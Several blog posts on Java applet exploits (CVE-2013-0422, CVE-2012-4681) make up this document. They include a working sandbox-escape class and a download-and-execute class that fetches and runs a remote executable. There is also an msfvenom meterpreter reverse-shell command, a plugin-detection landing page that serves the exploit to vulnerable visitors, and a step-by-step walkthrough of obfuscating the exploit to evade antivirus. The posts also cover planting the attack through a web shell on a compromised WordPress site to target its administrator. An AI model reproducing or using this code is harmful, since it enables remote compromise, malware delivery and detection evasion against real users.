<a href="http://3.bp.blogspot.com/-bllKQrtHvSU/USyW4-Ea2DI/AAAAAAAAAko/2uiZ3lzc8sY/s1600/java_disass.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="251" src="http://3.bp.blogspot.com/-bllKQrtHvSU/USyW4-Ea2DI/AAAAAAAAAko/2uiZ3lzc8sY/s640/java_disass.JPG" width="640" /></a></div>
<br />
Now, all we have to do is interpret these instructions. I will cover most important parts, if you want a full overview i suggest you to read Robert's post. The picture below means that a string is pushed onto the stack and then it goes to the decrypting subroutine. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-iLq-oVsUp6o/USyXVWOTM0I/AAAAAAAAAlM/k-UMb5HxWxA/s1600/storing_encrypted_strings.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-iLq-oVsUp6o/USyXVWOTM0I/AAAAAAAAAlM/k-UMb5HxWxA/s1600/storing_encrypted_strings.JPG" /></a></div>
<br />
The decrypting subroutine starts at instruction 132 by splitting the given string into a char array. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-XCN521Cnywo/USyXcgEExYI/AAAAAAAAAlU/1ejdGTG2Qpg/s1600/dcrypt_subroutine_starts.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-XCN521Cnywo/USyXcgEExYI/AAAAAAAAAlU/1ejdGTG2Qpg/s1600/dcrypt_subroutine_starts.JPG" /></a></div>
<br />
Next, an array of five elements is stored and from instruction 184 to 204 five integers (which are the keys) are pushed onto the stack and then a xor operation is performed. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-g3i0XcSb0bU/USyYGuuzTKI/AAAAAAAAAlc/0HTEx1VgmKw/s1600/xor.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-g3i0XcSb0bU/USyYGuuzTKI/AAAAAAAAAlc/0HTEx1VgmKw/s1600/xor.JPG" /></a></div>
<br />
Knowing this we can rebuild the code.<br />
<br />
For some strange reason syntax highlighter doesn't allow me to paste here this code, i will investigate.<br />
<br />
<a href="http://pastebin.com/fqAJpBdC">Link to pastebin</a><br />
<br />
Run it and voilĂ , all strings are decrypted. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-Q6Ahd7FVId8/USyYPWh4-4I/AAAAAAAAAlk/9iXMmdv6Sz8/s1600/deob_strings.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-Q6Ahd7FVId8/USyYPWh4-4I/AAAAAAAAAlk/9iXMmdv6Sz8/s1600/deob_strings.JPG" /></a></div>
I've renamed javaRun to Payload <br />
<pre class="brush: java">public class Payload implements PrivilegedExceptionAction
{
public Payload()
{
try
{
Class.forName("java.security.AccessController").getMethod("doPrivileged", new Class[] { Class.forName("java.security.PrivilegedExceptionAction")
}).invoke(Class.forName("java.security.AccessController"), new Object[] {
this
});
}
catch(Exception exception) { }
}
public Object run() throws Exception
{
System.setSecurityManager(null);
return null;
}
public static void outSandbox() throws Exception
{
Runtime.getRuntime().exec("calc.exe");
}
}</pre>
Instead of running the calculator into the run function i chose to create another function called outSandox to make it more clear.<br />
<br />
Back to init() instruction at line 84,85,86 call the same methods that we have already viewed. Instruction 89 return a string, apparently is the path of the jar. Instruction 90 and 91 call the construction from Payload class and instantiate it. <br />
<br />
I've modified a bit the code from the original version.<br />
<br />
<a href="http://pastebin.com/QWU1rqjf">Java 7u11 Exploit Source Code</a><br />
<br />
Now we have finished so let's test it out. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-qaNBcJWX80s/USyafkp3XCI/AAAAAAAAAmE/NMIEQnIQY9U/s1600/poc_works.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="344" src="http://2.bp.blogspot.com/-qaNBcJWX80s/USyafkp3XCI/AAAAAAAAAmE/NMIEQnIQY9U/s640/poc_works.jpg" width="640" /></a></div>
It works!. This PoC can be improved, but i leave it as it is. Instead of deobfuscating this applet Kafeine told me that there were some without obfuscation. The only thing i can say is bad luck for me.<br />
<br />
Hope you enjoyed. <br />
<br />
If you want to read an analysis of this vulnerability <a href="https://community.rapid7.com/community/metasploit/blog/2013/02/25/java-abused-in-the-wild-one-more-time">here</a> it is a post by Juan Vazquez from Rapid7.<br />
<br />
Reference: <br />
<ul>
<li><a href="http://quequero.org/2013/01/malicious-java-applet-deobfuscation/">http://quequero.org/2013/01/malicious-java-applet-deobfuscation/</a></li>
<li><a href="http://www.the-playground.dk/index.php?page=zelix-klassmaster-string-encryption">http://www.the-playground.dk/index.php?page=zelix-klassmaster-string-encryption</a> </li>
<li><a href="http://en.wikipedia.org/wiki/Java_bytecode_instruction_listings">http://en.wikipedia.org/wiki/Java_bytecode_instruction_listings</a></li>
</ul>
<!--1gy--><!--1gy--><!--1gy--><!--1gy-->Security Obscurityhttp://www.blogger.com/profile/06688159457167595136noreply@blogger.com0tag:blogger.com,1999:blog-3423828846307461333.post-60737399314489098812013-01-10T17:28:00.000+01:002013-04-02T21:23:15.403+02:00About the new java 0 day vulnerability (CVE-2013-0422)A couple of hours ago <a href="https://twitter.com/kafeine">@Kafeine</a> discovered a new java 0 day exploit in the wild.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-SYTRtkb-SRs/UO7ktVNMQ-I/AAAAAAAAAc0/G_a3aDmcI7c/s1600/kafeine_tweet.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-SYTRtkb-SRs/UO7ktVNMQ-I/AAAAAAAAAc0/G_a3aDmcI7c/s1600/kafeine_tweet.jpg" /></a></div>
<br />
This exploit is served by most exploit kits like Blackhole, Cool exploit kit and Nuclear pack.When the malicious applet is executed its download and execute a copy of Zeus.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-5jtaSv7Znhc/UO7lvrWdzPI/AAAAAAAAAdA/l1OZHNg8lmI/s1600/ff_process.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-5jtaSv7Znhc/UO7lvrWdzPI/AAAAAAAAAdA/l1OZHNg8lmI/s1600/ff_process.jpg" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-EelwGlRsAaA/UO7m1Ah0WgI/AAAAAAAAAdc/OnMNaW9fwos/s1600/zeus_details.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-EelwGlRsAaA/UO7m1Ah0WgI/AAAAAAAAAdc/OnMNaW9fwos/s1600/zeus_details.jpg" /></a></div>
<br />
A curious thing is that Zbot comes with a self signed digital certificate.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-6W-z0qeCZls/UO7i5ObHd_I/AAAAAAAAAcY/kz2J1Pd8h0g/s1600/zeus_certificate.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-6W-z0qeCZls/UO7i5ObHd_I/AAAAAAAAAcY/kz2J1Pd8h0g/s1600/zeus_certificate.jpg" /></a></div>
<br />
But detection rate is quite good with 12/46 <a href="https://www.virustotal.com/file/54c196849f3138fa76eea10db3ae6cc14e27b9234bf4704e98ebf376b9a67ee2/analysis/1357832719/">link</a>.<br />
<br />
The jar file has been dropped by Blackhole so it's heavily obsfuscated by some commercial obfuscator and is detected by 5/46 <a href="https://www.virustotal.com/file/dcb87472aebdd993bd0c2179c9b5ce930fb1836121bd7aaec5f0b167602fff2b/analysis/1357831496/">link</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-1lg2xn8I2e8/UO7pOH7zOXI/AAAAAAAAAeI/wdLJQYHhPOA/s1600/java_exploit_screen.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="462" src="http://4.bp.blogspot.com/-1lg2xn8I2e8/UO7pOH7zOXI/AAAAAAAAAeI/wdLJQYHhPOA/s640/java_exploit_screen.jpg" width="640" /></a></div>
<br />
You can find both files <a href="http://www.kernelmode.info/forum/viewtopic.php?f=16&t=1819&start=20#p17675">here</a>. (password is: malware)<br />
<br />
If you want to read more take a look at kafeine's <a href="http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html">blog post</a>.<br />
<br />
-- Update<br />
<br />
Working Poc <a href="http://pastebin.com/cas8WEBZ">here</a>.<br />
<br />
Quick video to show you this PoC against Avira Free antivirus<br />
<br />
<iframe allowfullscreen="allowfullscreen" frameborder="0" height="360" src="http://www.youtube.com/embed/OefY9gB-ITM" width="640"></iframe>Security Obscurityhttp://www.blogger.com/profile/06688159457167595136noreply@blogger.com2tag:blogger.com,1999:blog-3423828846307461333.post-70081316576160510732012-12-07T13:54:00.001+01:002012-12-07T13:54:52.632+01:00Attacking Windows 8 with Java Exploit and MetasploitIn the last post i was talking about how to obfuscate a Java exploit (CVE-2012-4681 link <a href="http://security-obscurity.blogspot.com/2012/11/java-exploit-code-obfuscation-and.html">here</a>), now i want to show you how an attacker can use this obfuscated exploit for a <b>targeted</b> attack.<br />
<br />
This is intended to be the second part of <a href="https://www.youtube.com/watch?v=JrwlislvE1U">Wordpress Cookie Grabber</a> video because i will show what you can do once you have compromised a website, frank's blog in this case. The victim will be only the administrator.<br />
<br />
The exploit code in the previous article just escape from java sandbox and launch windows calculator. What we want to do is launch something different, like a meterpreter reverse shell which will connect back to the attacker. Thus in the previous code we have to add a download & execute class/method.<br />
<br />
I opted for a new class but you can certainly add a method in the same class. This new class called NewClass (i'm lacking of fantasy) will download a meterpreter executable from a remote host and save it with the name fsc73B8.tmp.exe into temp folder, after that will be executed.<br />
<br />
<pre class="brush: java">class NewClass
{
// Directory
String t = "java", m = "io", p = "tmpdir", dot = ".";
// Remote url
String r1 = "http:", e = "//192", m1 = "168", o = "2.3/fo", t1 = "lder/java", e1 = "exe";
public NewClass()
{
String l = System.getProperty( t+dot+m+dot+p ); // get temp folde path
String r = r1+e+dot+m1+dot+o+t1+dot+e1;
d( r, l);
}
private void d(String rPath, String lPath)
{
// File name
lPath += "\\fsc73B8.tmp.";
try
{
URL url = new URL(rPath);
ReadableByteChannel rbc = Channels.newChannel(url.openStream());
FileOutputStream fos = new FileOutputStream(lPath+"exe");
fos.getChannel().transferFrom(rbc, 0, 1 << 24);
fos.close();
// execute
Runtime.getRuntime().exec(lPath+"exe");
} catch( Exception e ){}
}
}
</pre>
<br />
This two classes will be packed in one jar named <b>java.jar;</b> now it will be detected by antivirus ?<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-LfE0WKokF60/ULjgWfi_R1I/AAAAAAAAAZw/HBe1tZct7Nk/s1600/jar_detection.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-LfE0WKokF60/ULjgWfi_R1I/AAAAAAAAAZw/HBe1tZct7Nk/s1600/jar_detection.jpg" /></a></div>
<br />
Link <a href="https://www.virustotal.com/file/0bfb911acc46a593b9fb82574127af598eba0d25277f2cdbe266f44020fffcf6/analysis/1352409560/">here</a>.<br />
<br />
Ok, great it's not detected. In our scenario we have to infect only the administrator (Frank), if he has a vulnerable version of java. To check this we use <a href="http://www.pinlady.net/PluginDetect/">PluginDetect</a> a powerfull javascript script (used also by Blackhole till version 1.2.5) able to detect all plugins installed on browser.<br />
<br />
The page that check this will look like this.<br />
<br />
<pre class="brush: xml"><script src="PluginDetect.js" type="text/javascript"></script>
<script type="text/javascript">
// detect java plugin
if( PluginDetect.isMinVersion("Java") >= 0 )
{
// check version
PluginDetect.getVersion(" ");
var version = PluginDetect.getVersion("Java");
// Affected versions
// 170, 1701, 1702, 1703, 1704, 1705, 1706
version = version.replace(/\s/g, "");
if( version.legth == 3 )
version = "1700";
// Convert to int so i can compare
var intVersion = parseInt(version);
// if vulnerable
if( intVersion >= 1700 && intVersion <= 1706 )
{
document.write("&lt;applet code=\"Java.class\" archive=\"java.jar\"&gt;&lt;/applet&gt;");
}
}
</script>
</pre>
<br />
Now it's time to create a meterpreter tcp reverse shell that connect back to us.<br />
<br />
<pre class="brush: plain">sudo msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=192.168.2.10 LPORT=15000 > meterpreter.exe
</pre>
<br />
As you can image this executable will be detected by most antivirus, even if we use encoders. The best solution would be to create your own crypter since all crypters that you would find online aren't FUD, because they are public. I don't have time to create my own (and i don't know how to do it), but one day i will. In this page there are few crypters claiming to be Fully Undetectable, i chose 0vcrypter because can bypass Microsoft detection.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-JKnH40ZjuoI/ULuSozpvhqI/AAAAAAAAAb4/9Yl5VuRRcW0/s1600/crypter.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://2.bp.blogspot.com/-JKnH40ZjuoI/ULuSozpvhqI/AAAAAAAAAb4/9Yl5VuRRcW0/s320/crypter.jpg" width="316" /></a></div>
<br />
Frank lives in the United States and following this chart provided by <a href="http://opswat.com/">opswat.com</a> Microsoft Security Essential is the most widespread antivirus. With the default adoption by Windows 8 in the next months this percentage will increase even more.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-PKHswUy0wBo/ULt-aWxozcI/AAAAAAAAAbE/Y4OOL2uAnnY/s1600/av_market_share.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="299" src="http://1.bp.blogspot.com/-PKHswUy0wBo/ULt-aWxozcI/AAAAAAAAAbE/Y4OOL2uAnnY/s640/av_market_share.jpg" width="640" /></a></div>
<br />
After crypted our meterpreter shell and renamed java.exe we have all files that we need:<br />
<ul>
<li>page.html (landing page)</li>
<li>PluginDetect.js</li>
<li>java.jar (exploit)</li>
<li>java.exe (meterpreter shell)</li>
</ul>
Now we can upload all these files to a remote host.<br />
<br />
If you remember in the previous video we have left a weevely shell on his site so now we can connect to it and modify <b>admin-header.php </b>located into <b>wp-admin</b> folder.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-5T0a996Fzhk/ULuSi54kCVI/AAAAAAAAAbw/3fnxEalY2q0/s1600/add_iframe.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="380" src="http://1.bp.blogspot.com/-5T0a996Fzhk/ULuSi54kCVI/AAAAAAAAAbw/3fnxEalY2q0/s640/add_iframe.jpg" width="640" /></a></div>
<br />
Now start a meterpreter listener and if we were lucky that frank has a vulnerable version of java, our shell will be dropped correctly.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-rWKVlVXyNp4/ULuScV-KD7I/AAAAAAAAAbo/NfRXxiJU4d4/s1600/connect_back.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="376" src="http://4.bp.blogspot.com/-rWKVlVXyNp4/ULuScV-KD7I/AAAAAAAAAbo/NfRXxiJU4d4/s640/connect_back.jpg" width="640" /></a></div>
<br />
Once we have a meterpreter session we can do a lot of things but for now just took a screenshot of the desktop.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-36xVE-n8fPU/ULuSPeQyNyI/AAAAAAAAAbg/MzdDMx-LEyo/s1600/victim_desktop.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="359" src="http://2.bp.blogspot.com/-36xVE-n8fPU/ULuSPeQyNyI/AAAAAAAAAbg/MzdDMx-LEyo/s640/victim_desktop.jpg" width="640" /></a></div>
<br />
Enjoy the video.<br />
<br />
<iframe allowfullscreen="allowfullscreen" frameborder="0" height="360" src="http://www.youtube.com/embed/SMDr7Y2yVAs" width="640"></iframe><br />
<br />
Reference:<br />
<ul>
<li><a href="http://www.invisiblehackers.in/2012/04/make-your-keylogger-to-undetectable.html">http://www.invisiblehackers.in/2012/04/make-your-keylogger-to-undetectable.html</a></li>
<li><a href="http://www.opswat.com/about/media/reports/antivirus-september-2012">http://www.opswat.com/about/media/reports/antivirus-september-2012</a></li>
</ul>
Security Obscurityhttp://www.blogger.com/profile/06688159457167595136noreply@blogger.com3tag:blogger.com,1999:blog-3423828846307461333.post-43328807635792982072012-11-15T08:24:00.000+01:002012-12-13T08:57:58.003+01:00Java Exploit Code Obfuscation and Antivirus Bypass/Evasion (CVE-2012-4681)Why not play a game where we try to make the latest (at time of writing) public java exploit (<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-4681">CVE-2012-4681</a>) undetected by all antivirus and see who will be the last to detect it ?. I think it will be a funny "challenge" because evading antivirus has always his charm.<br />
<br />
I will not use software obfuscators like proGuard, Allatori, Zelix KlassMaster etc... This because will not be funny. This is not intended to be an analysis or explanation because there are already great post here:<br />
<ul>
<li><a href="http://immunityproducts.blogspot.com.ar/2012/08/java-0day-analysis-cve-2012-4681.html">http://immunityproducts.blogspot.com.ar/2012/08/java-0day-analysis-cve-2012-4681.html</a></li>
<li><a href="http://www.deependresearch.org/2012/08/java-7-vulnerability-analysis.html">http://www.deependresearch.org/2012/08/java-7-vulnerability-analysis.html</a></li>
<li><a href="http://www.h-online.com/security/features/The-new-Java-0day-examined-1677789.html">http://www.h-online.com/security/features/The-new-Java-0day-examined-1677789.html</a></li>
</ul>
<br />
Before we start we need to make two considerations:<br />
<ul>
<li>From <i><a href="http://www.securelist.com/en/blog/208193822/The_Current_Web_Delivered_Java_0day">The Current Web-Delivered Java 0Day</a>: </i>So while you may see a few links to Virustotal with the inevitable complaining that a scanner is missing a specific chunk of altered code along with innaccurate claims that "AV is dead!" or "AV can't detect it", you should take them for the grain of salt that they are. The real story about client side mass exploitation is more complex than those claims.</li>
<li>The sequence of bypassed antivirus mainly depends on how i modify the exploit/flow.</li>
</ul>
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;">Last Antivirus Standing</span></b></div>
<br />
Who will be the last ? make your guess.<br />
<br />
Let's start just copying the code from jduck poc taken from here: <a href="http://pastie.org/4594319">http://pastie.org/4594319</a>. Upload compiled applet (.class file) to virustotal and we start with a detection of 23/43, first popular fall are from Kaspersky, McAfee, Panda.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-8gdHwVo4rkY/UJ93lENwsrI/AAAAAAAAAW4/OVK6dYHBaVc/s1600/av_23_44_complete.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-8gdHwVo4rkY/UJ93lENwsrI/AAAAAAAAAW4/OVK6dYHBaVc/s1600/av_23_44_complete.jpg" /></a></div>
<br />
Virustotal link <a href="https://www.virustotal.com/file/0fbeaac1828564bf177f552d812b16809c8e57b4b215e1d864fda1f13aee1044/analysis/1351439396/">here</a>.<br />
Full image <a href="https://lh3.googleusercontent.com/--hNolEfuOdg/UJJDkoDeDUI/AAAAAAAAATY/cZOJ8GFHOxo/h120/23_44.png">here</a>.<br />
<br />
One important thing are strings, as you can see there are few of them, for example (sun.awt.SunToolkit, file://, forName etc..). On step to bring down detection is to obfuscate these strings. For example<br />
sun.awt.SunToolkit will become a char array. There are a lot of other ways to obfuscate a string for example using StringBuilder, hex to ascii, decimal to ascii, string.replace and so on.<br />
<br />
<pre class="brush: java">// setSecurityManager
String secMan = "22s234e34523454tS345e334545c345u5356r67i6t6y4354834M90a6n4a4g345e34r34";
//sun.awt.SunToolkit
char sun[] = {'s','u','n','.','a','w','t','.','S','u','n','T','o','o','l','k','i','t'};
// file
char file[] = {(char)102,(char)105,(char)108,(char)101,(char)58,(char)47,(char)47,(char)47};
// forName
String ad = "or",me = "me", aw = "f", kl = "Na";
// getField
String field = "789g8795e456"+"5t5765F5675"+"567i6765e756"+"567l567d567";
</pre>
<br />
Once done, compile and reupload it again.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-JrnQM4DfQbQ/UJPkhopwD-I/AAAAAAAAAUY/IFGh4CAcbUo/s1600/av_9_44.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-JrnQM4DfQbQ/UJPkhopwD-I/AAAAAAAAAUY/IFGh4CAcbUo/s1600/av_9_44.jpg" /></a></div>
<br />
Virustotal link <a href="https://www.virustotal.com/file/3c53f93ec24f6188b2921747d978821ada493694024686b4ec5d289d3e1988ed/analysis/1351446739/">here</a>.<br />
Full image <a href="http://3.bp.blogspot.com/-6JAm7zRK5BQ/UKKgkxJBEjI/AAAAAAAAAXo/DllMRLKKdI0/s1600/11-44.png">here</a>.<br />
Code <a href="http://pastebin.com/63GQx6Fx">here</a>.<br />
<br />
As you can see just obfuscating a bunch of strings can decrease antivirus detection. Twelve antivirus are out of the game, most notable defeats are from Microsoft, Symantec, TrendMicro and DrWeb.<br />
<br />
Now we can clean a bit the code because we don't need functions like paint. In addition we change applet name from Gondvv to Java, merge code from setField with diableSecurity and have a function named disableSecurity is not a good thing. Now the code will look like this.<br />
<br />
<pre class="brush: java">public class Java extends Applet
{
// setSecurityManager
setSecurityManagerString secMan = "22s234e34523454tS345e334545c345u5356r67i6t6y4354834M90a6n4a4g345e34r34";
//sun.awt.SunToolkit
char sun[] = {'s','u','n','.','a','w','t','.','S','u','n','T','o','o','l','k','i','t'};
// file
char file[] = {(char)102,(char)105,(char)108,(char)101,(char)58,(char)47,(char)47,(char)47};
// forName
String ad = "or",me = "me", aw = "f", kl = "Na";
// getField
String field = "789g8795e456"+"5t5765F5675"+"567i6765e756"+"567l567d567";
public void enableSecurity() throws Throwable
{
Statement localStatement = new Statement(System.class, secMan.replaceAll("\\d",""), new Object[1]);
Permissions localPermissions = new Permissions();
localPermissions.add(new AllPermission());
ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL(new String(file)), new Certificate[0]), localPermissions);
AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
localProtectionDomain
});
Object arrayOfObject[] = new Object[2];
arrayOfObject[0] = Statement.class;
arrayOfObject[1] = "a"+"c"+"c";
Expression localExpression = new Expression(GetClass(new String(sun)), field.replaceAll("\\d",""), arrayOfObject);
localExpression.execute();
((Field)localExpression.getValue()).set(localStatement, localAccessControlContext);
localStatement.execute();
}
public void init()
{
try
{
enableSecurity();
Runtime.getRuntime().exec("calc");
}
catch(Throwable t){}
}
private Class GetClass(String paramString) throws Throwable
{
Object arrayOfObject[] = new Object[1];
arrayOfObject[0] = paramString;
Expression localExpression = new Expression(Class.class, aw+ad+kl+me, arrayOfObject);
localExpression.execute();
return (Class)localExpression.getValue();
}
}
</pre>
<br />
Once again compile and reupload.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-Vhvcefc61oA/UJPoi_qNKnI/AAAAAAAAAUw/tSyfEFkdwiI/s1600/av_9_44.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-Vhvcefc61oA/UJPoi_qNKnI/AAAAAAAAAUw/tSyfEFkdwiI/s1600/av_9_44.jpg" /></a></div>
<br />
<br />
Virustotal link <a href="https://www.virustotal.com/file/e76e179656fe15e4ed6f7611246911c764654ccc7ae646ce1bfb728322d55b0a/analysis/1351447836/">here</a>.<br />
Full image <a href="http://4.bp.blogspot.com/-8QcYI4JmhQ0/UKKy3w13utI/AAAAAAAAAYM/aX4fYKbTVng/s1600/9-44.png">here</a>.<br />
<br />
Ratio is 9/44, Avast and MicroWorld-eScan fall under a simple function/class renaming. Now we modify a bit the flow and renaming all variables, for example <b>localPermissions</b> will be <b>pe</b>. Once again reupload to virustotal.<br />
<br />
Damn detection ratio still 9/44 (same picture above). How we can drop detection ? simple, do the same thing but in another way. When i try to make an exploit to be undetected by antivirus i start testing line by line following the flow of the exploit and see which line trigger some antivirus. In this case from line 32 we start triggering F-Secure.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-5X56Y0OuuWs/UJQImhFZivI/AAAAAAAAAVI/LMhi1rTPIhs/s1600/line_32.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-5X56Y0OuuWs/UJQImhFZivI/AAAAAAAAAVI/LMhi1rTPIhs/s1600/line_32.jpg" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-rIN2hFMqAio/UJ-7WNfu4pI/AAAAAAAAAXQ/WcYX6v48Kd8/s1600/fsecure_1_44.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-rIN2hFMqAio/UJ-7WNfu4pI/AAAAAAAAAXQ/WcYX6v48Kd8/s1600/fsecure_1_44.jpg" /></a></div>
<br />
<br />
Another tip is to remove some variables and see if detection ratio change, in this case if we remove <b>Statement.class</b> and substitute it with null detection will go from 9/44 to 7/44.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-LIjAmnySAzY/UJQJM4YnNUI/AAAAAAAAAVQ/fe9upDC1cjw/s1600/null_statement.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-LIjAmnySAzY/UJQJM4YnNUI/AAAAAAAAAVQ/fe9upDC1cjw/s1600/null_statement.jpg" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-McKilnCkx4s/UKK1KO9qujI/AAAAAAAAAYU/mVvYtf-26ec/s1600/av_7_44_test.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-McKilnCkx4s/UKK1KO9qujI/AAAAAAAAAYU/mVvYtf-26ec/s1600/av_7_44_test.jpg" /></a></div>
<br />
Virustotal link <a href="https://www.virustotal.com/file/3da0e1996c8367eae5e45fe7f19b242cb4ba3545e14496ef9582fe3711dcec59/analysis/">here</a>.<br />
<br />
Thus, can i retrieve Statement class in another way ? For sure and we have this method under our nose because instead of using other ways like <b>Class.forname("Statment")</b> we can use GimmeClass.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-_gbfM5zGXek/UJQJ7xphfrI/AAAAAAAAAVY/Gr5kNwDQi8w/s1600/gimme_class-statement.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-_gbfM5zGXek/UJQJ7xphfrI/AAAAAAAAAVY/Gr5kNwDQi8w/s1600/gimme_class-statement.jpg" /></a></div>
<br />
Reupload .class file to virustotal and let's see if that works.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-pnty93d8c_E/UJQLD4lZimI/AAAAAAAAAVg/QCkaq_tTG3Y/s1600/7_44.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-pnty93d8c_E/UJQLD4lZimI/AAAAAAAAAVg/QCkaq_tTG3Y/s1600/7_44.jpg" /></a></div>
<br />
Virustotal link <a href="https://www.virustotal.com/file/c2150862a76a0d4fe88f01f021135d36ba18e462b616e9674f487e64c6a8066d/analysis/1351458807/">here</a>.<br />
Full image <a href="http://2.bp.blogspot.com/-lD378ozKfCQ/UKP1sYN5gwI/AAAAAAAAAZU/kOMtCWQ32t0/s320/7-44.png">here</a>.<br />
<br />
Code <a href="http://pastebin.com/cdD7FU2m">here</a>.<br />
<br />
<pre class="brush: java">public class Java extends Applet
{
// setSecurityManager
String secMan = "22s234e34523454tS345e334545c345u5356r67i6t6y4354834M90a6n4a4g345e34r34";
//sun.awt.SunToolkit
char sun[] = {'s','u','n','.','a','w','t','.','S','u','n','T','o','o','l','k','i','t'};
// file
char file[] = {(char)102,(char)105,(char)108,(char)101,(char)58,(char)47,(char)47,(char)47};
// forName
String ad = "or",me = "me", aw = "f", kl = "Na";
// getField
String field = "789g8795e456"+"5t5765F5675"+"567i6765e756"+"567l567d567";
public void enableSecurity() throws Throwable
{
Object ao[] = new Object[2];
ao[0] = GimmeClass("java.beans.Statement"); //Statement.class;
ao[1] = "a"+"c"+"c";
Expression e = new Expression(GimmeClass(new String(sun)), field.replaceAll("\\d",""), ao);
e.execute();
Field field = (Field)e.getValue();
Permissions pe = new Permissions();
pe.add(new AllPermission());
CodeSource cs = new CodeSource(new URL(new String(file)), new Certificate[0]);
ProtectionDomain pd = new ProtectionDomain(cs, pe);
AccessControlContext ac = new AccessControlContext(new ProtectionDomain[] { pd });
Statement stat = new Statement( System.class,secMan.replaceAll("\\d",""), new Object[1]);
field.set(stat, ac);
stat.execute();
}
public void init()
{
try
{
enableSecurity();
Runtime.getRuntime().exec("calc");
}
catch(Throwable t){}
}
private Class GimmeClass(String ps) throws Throwable
{
Expression le = new Expression(Class.class, aw+ad+kl+me, new Object[] {ps});
le.execute();
return (Class)le.getValue();
}
}
</pre>
Now detection ration is 7/44 and AVG and ESET are gone.<br />
<br />
Again we remove some part of the code to see where detection will change. If we delete last three lines of code detection will be 0/44. But these lines instantiate a class and call a method, how we can do this in another way ? Simple, we use reflection.<br />
<br />
